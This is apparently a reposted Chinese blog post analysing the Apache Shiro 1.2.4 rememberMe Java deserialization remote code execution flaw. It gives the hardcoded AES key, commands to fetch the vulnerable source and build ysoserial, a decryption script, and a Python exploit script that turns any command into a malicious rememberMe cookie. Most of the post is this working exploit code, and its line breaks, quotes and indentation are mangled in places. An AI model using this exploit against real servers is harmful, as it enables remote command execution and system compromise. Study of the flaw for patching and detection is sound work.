漏洞介绍

• 漏洞类型 ：JAVA反序列化（RCE）
• 影响版本 ：Apache Shiro 1.2.4及其之前版本
• 漏洞评级 ：高危

漏洞分析 #：

下载漏洞环境：

git clone https://github.com/apache/shiro.gitgit checkout shiro-root-1.2.4

工具下载

git　clone https://github.com/frohoff/ysoserial.gitcd ysoserialmvn package -DskipTestscp target/ysoserial-0.0.5-SNAPSHOT-all.jar /tmp

该漏洞在传输中使用了AES CBC加密和Base64编码，CookieRememberMemanager.java类中的父类AbstractRememberMeManager中有硬编码秘钥:Base64.decode("kPH+bIxk5D2deZiIxcaaaA==") ,python的解密代码：

# pip install pycryptoimport sysimport base64from Crypto.Cipher import AESdef decode_rememberme_file(filename): ???with open(filename, ‘rb‘) as fpr: ???????key ?= ?"kPH+bIxk5D2deZiIxcaaaA==" ???????mode = ?AES.MODE_CBC ???????IV ??= b‘ ‘ * 16 ???????encryptor = AES.new(base64.b64decode(key), mode, IV=IV) ???????remember_bin = encryptor.decrypt(fpr.read()) ???return remember_binif __name__ == ‘__main__‘: ???with open("/tmp/decrypt.bin", ‘wb+‘) as fpw: ???????fpw.write(decode_rememberme_file(sys.argv[1]))

漏洞序列化的对象是 PrincipalCollection,利用脚本

# pip install pycryptoimport sysimport base64import uuidfrom random import Randomimport subprocessfrom Crypto.Cipher import AES def encode_rememberme(command): ???popen = subprocess.Popen([‘java‘, ‘-jar‘, ‘ysoserial-0.0.5-SNAPSHOT-all.jar‘, ‘CommonsCollections2‘, command], stdout=subprocess.PIPE) ???BS ??= AES.block_size ???pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() ???key ?= ?"kPH+bIxk5D2deZiIxcaaaA==" ???mode = ?AES.MODE_CBC ???iv ??= ?uuid.uuid4().bytes ???encryptor = AES.new(base64.b64decode(key), mode, iv) ???file_body = pad(popen.stdout.read()) ???base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) ???return base64_ciphertext if __name__ == ‘__main__‘: ???payload = encode_rememberme(sys.argv[1]) ???????with open("/tmp/payload.cookie", "w") as fpw: ???????print("rememberMe={}".format(payload.decode()), file=fpw)

Apache Shiro 反序列化RCE漏洞

原文地址：https://www.cnblogs.com/KevinGeorge/p/9252036.html